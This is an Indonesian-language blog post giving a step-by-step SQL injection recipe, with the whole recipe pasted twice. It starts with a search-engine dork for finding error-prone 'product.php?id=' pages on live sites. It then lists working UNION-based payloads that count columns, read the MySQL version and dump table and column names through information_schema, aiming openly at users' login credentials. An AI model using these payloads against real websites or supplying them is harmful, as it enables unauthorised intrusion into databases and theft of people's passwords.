*Step By Step Sql injection
- inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"
- order by 1-- sampai ketemu eror
- union all select N --
N= sampai erorr ke breapa dari hasil order by td
(kalo udah ketemu angka itu vuln)
- union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16--
- vulin ada di nomor 4 version buat liat versi mysql
- union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where table_schema=database()--
- tambahin +from+information_schema.tables+where+table_schema=database()-- version ganti group concat
- union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns+where+table_name=0x6c6f67696e--
ganti nama tabel pake hexa
http://cyber4rt.com/~converter
dapet deh user paswdnya
->
- order by 1-- sampai ketemu eror
- union all select N --
N= sampai erorr ke breapa dari hasil order by td
(kalo udah ketemu angka itu vuln)
- union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16--
- vulin ada di nomor 4 version buat liat versi mysql
- union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where table_schema=database()--
- tambahin +from+information_schema.tables+where+table_schema=database()-- version ganti group concat
- union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns+where+table_name=0x6c6f67696e--
ganti nama tabel pake hexa
http://cyber4rt.com/~converter
dapet deh user paswdnya
->
Kunjungi Link dibawah ini…
http://opensource.telkomspeedy.com/wiki/index.php/SQL_Injection_Web_dengan_Dork
Tidak ada komentar:
Posting Komentar